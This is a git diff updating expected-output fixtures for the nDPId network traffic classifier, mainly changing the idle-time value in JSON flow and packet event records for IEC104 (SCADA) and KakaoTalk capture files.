-00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1317629088520,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1317629088520,"pkt":"eCvLK7lWABIAxkrACABFAAAoSx9AAH0GYW0Kr9MDCndpGglk1fFZgPwe3z\/\/ZlAQ+y9PxQAAAAAAAAAA"} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1317629088532,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1317629088532,"pkt":"eCvLK7lWABIAxkrACABFAAAuUsZAAH0GWcIKr9MBCndpGglk1fBIoLt3AFkTVVAY\/em9wgAAaAQBAEK5"} 
-00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1317629088495,"flow_last_seen":1317629088532,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1317629088532,"l3_proto":"ip4","src_ip":"10.175.211.1","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54768,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1317629088536,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1317629088536,"pkt":"eCvLK7lWABIAxkrACABFAAAuSyRAAH0GYWIKr9MDCndpGglk1fFZgPwe3z\/\/ZlAY+y+j+QAAaAQBAEK5"} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1317629088520,"flow_last_seen":1317629088536,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1317629088536,"l3_proto":"ip4","src_ip":"10.175.211.3","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54769,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 
-00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1317629088731,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1317629088731,"pkt":"AAAMB6wBeCvLK7lWCABFAAAoJ9JAAIAGAAAKd2kaCq\/TAdXwCWQAWRNVSKC7fVAQAP5RXAAA"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1317629088739,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1317629088739,"pkt":"AAAMB6wBeCvLK7lWCABFAAAoJ9tAAIAGAAAKd2kaCq\/TA9XxCWTfP\/9mWYD8JFAQAP5RXgAA"} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1317629088495,"flow_last_seen":1317629090498,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":252,"flow_tot_l4_payload_len":603,"flow_avg_l4_payload_len":50,"midstream":1,"thread_ts_msec":1317629090498,"l3_proto":"ip4","src_ip":"10.175.211.1","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 
-00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1317629088520,"flow_last_seen":1317629088739,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1317629090498,"l3_proto":"ip4","src_ip":"10.175.211.3","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54769,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317629088495,"flow_last_seen":1317629088495,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1317629088495,"l3_proto":"ip4","src_ip":"10.175.211.1","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1317629088495,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1317629088495,"pkt":"eCvLK7lWABIAxkrACABFAAAoUqRAAH0GWeoKr9MBCndpGglk1fBIoLt3AFkTVVAQ\/elpjgAAAAAAAAAA"} 
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1317629088520,"flow_last_seen":1317629088520,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1317629088520,"l3_proto":"ip4","src_ip":"10.175.211.3","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54769,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1317629088520,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1317629088520,"pkt":"eCvLK7lWABIAxkrACABFAAAoSx9AAH0GYW0Kr9MDCndpGglk1fFZgPwe3z\/\/ZlAQ+y9PxQAAAAAAAAAA"} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1317629088532,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1317629088532,"pkt":"eCvLK7lWABIAxkrACABFAAAuUsZAAH0GWcIKr9MBCndpGglk1fBIoLt3AFkTVVAY\/em9wgAAaAQBAEK5"} 
+00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1317629088495,"flow_last_seen":1317629088532,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1317629088532,"l3_proto":"ip4","src_ip":"10.175.211.1","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54768,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1317629088536,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1317629088536,"pkt":"eCvLK7lWABIAxkrACABFAAAuSyRAAH0GYWIKr9MDCndpGglk1fFZgPwe3z\/\/ZlAY+y+j+QAAaAQBAEK5"} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1317629088520,"flow_last_seen":1317629088536,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":3,"midstream":1,"thread_ts_msec":1317629088536,"l3_proto":"ip4","src_ip":"10.175.211.3","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54769,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 
+00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1317629088731,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1317629088731,"pkt":"AAAMB6wBeCvLK7lWCABFAAAoJ9JAAIAGAAAKd2kaCq\/TAdXwCWQAWRNVSKC7fVAQAP5RXAAA"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1317629088739,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1317629088739,"pkt":"AAAMB6wBeCvLK7lWCABFAAAoJ9tAAIAGAAAKd2kaCq\/TA9XxCWTfP\/9mWYD8JFAQAP5RXgAA"} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1317629088495,"flow_last_seen":1317629090498,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":252,"flow_tot_l4_payload_len":603,"flow_avg_l4_payload_len":50,"midstream":1,"thread_ts_msec":1317629090498,"l3_proto":"ip4","src_ip":"10.175.211.1","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":15,"source":"IEC104.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1317629088520,"flow_last_seen":1317629088739,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":6,"flow_tot_l4_payload_len":6,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1317629090498,"l3_proto":"ip4","src_ip":"10.175.211.3","dst_ip":"10.119.105.26","src_port":2404,"dst_port":54769,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IEC60870","breed":"Acceptable","category":"IoT-Scada"}} 00551{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":15,"source":"IEC104.pcap","alias":"nDPId-test","packets-captured":15,"packets-processed":15,"total-skipped-flows":0,"total-l4-data-len":609,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1317629090498} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 15/15 diff --git a/test/results/KakaoTalk_chat.pcap.out b/test/results/KakaoTalk_chat.pcap.out index 445bd2589..c41b547d5 100644 --- a/test/results/KakaoTalk_chat.pcap.out +++ b/test/results/KakaoTalk_chat.pcap.out 
@@ -60,21 +60,21 @@ 00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022252,"flow_last_seen":1430069022295,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1430069022295,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":43077,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"dn-l.talk.kakao.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"110.76.141.86"}} 00554{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1430069022295,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":126,"pkt_l4_len":90,"thread_ts_msec":1430069022295,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAG4b2QAANREBFgq8AQEKGFK8ADViHQBaJnpwlYGAAAEAAgAAAAAFdXAtZ3AEdGFsawVrYWthbwNjb20AAAEAAcAMAAUAAQAABasAEAV1cC1ncAR0YWxrAmdswBfAMgABAAEAAACsAARuTI0a"} 00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069022252,"flow_last_seen":1430069022295,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":82,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1430069022295,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":25117,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.KakaoTalk","breed":"Acceptable","category":"Chat"},"dns": {"query":"up-gp.talk.kakao.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"110.76.141.26"}} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022297,"flow_last_seen":1430069022297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069022297,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1430069022297,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069022297,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzzVkAAPwZJoAoYUrxn9jn7x00fkMsN9JkAAAAAoAI5CGIPAAACBAV4BAIICgALB88AAAAAAQMDBw=="} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1430069022411,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069022411,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAALQZO92f2OfsKGFK8H5DHTSs\/AzbLDfSaoBIWoGVTAAACBAV4BAIICpj2V6UACwfPAQMDCQ=="} 
-00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1430069022419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069022419,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADTzV0AAPwZJpwoYUrxn9jn7x00fkMsN9JorPwM3gBAAc6oGAAABAQgKAAsH25j2V6U="} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069026012,"flow_last_seen":1430069026012,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069026012,"l3_proto":"ip4","src_ip":"216.58.221.10","dst_ip":"10.24.82.188","src_port":80,"dst_port":35922,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1430069026012,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069026012,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcACiq7kAArAYRrNg63QoKGFK8AFCMUmKi4jFDN+TzUBH\/\/6QYAAA="} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1430069026058,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069026058,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACgAAEAAPwYptwoYUrzYOt0KjFIAUEM35dFioucAUBA+dl\/2AAA="} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1430069026148,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069026148,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcACiq70AArQYQq9g63QoKGFK8AFCMUmKi4jFDN+TzUBH\/\/6QYAAA="} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069026370,"flow_last_seen":1430069026370,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069026370,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
-00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1430069026370,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069026370,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzmtkAAPwbpMgoYUryt\/GECiq8Bu\/wa79AAAAAAoAI5CCGaAAACBAV4BAIICgALCWYAAAAAAQMDBw=="} -00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1430069027366,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069027366,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzmt0AAPwbpMQoYUryt\/GECiq8Bu\/wa79AAAAAAoAI5CCE2AAACBAV4BAIICgALCcoAAAAAAQMDBw=="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1430069027408,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069027408,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACyOBEAA+AaI9K38YQIKGFK8AbuKr2Aiq0X8Gu\/RYBIRHJekAAACBAV4"} 
-00957{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1430069026370,"flow_last_seen":1430069027422,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1430069027422,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069028075,"flow_last_seen":1430069028075,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069028075,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34503,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1430069028075,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069028075,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACgUEEAA+AZ+3XgcGvIKGFK8AFCGx0Ds0yKXy0vyUBQAAEEKAAA="} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069022297,"flow_last_seen":1430069022297,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069022297,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1430069022297,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069022297,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzzVkAAPwZJoAoYUrxn9jn7x00fkMsN9JkAAAAAoAI5CGIPAAACBAV4BAIICgALB88AAAAAAQMDBw=="} 
+00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1430069022411,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069022411,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAALQZO92f2OfsKGFK8H5DHTSs\/AzbLDfSaoBIWoGVTAAACBAV4BAIICpj2V6UACwfPAQMDCQ=="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1430069022419,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069022419,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADTzV0AAPwZJpwoYUrxn9jn7x00fkMsN9JorPwM3gBAAc6oGAAABAQgKAAsH25j2V6U="} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069026012,"flow_last_seen":1430069026012,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069026012,"l3_proto":"ip4","src_ip":"216.58.221.10","dst_ip":"10.24.82.188","src_port":80,"dst_port":35922,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
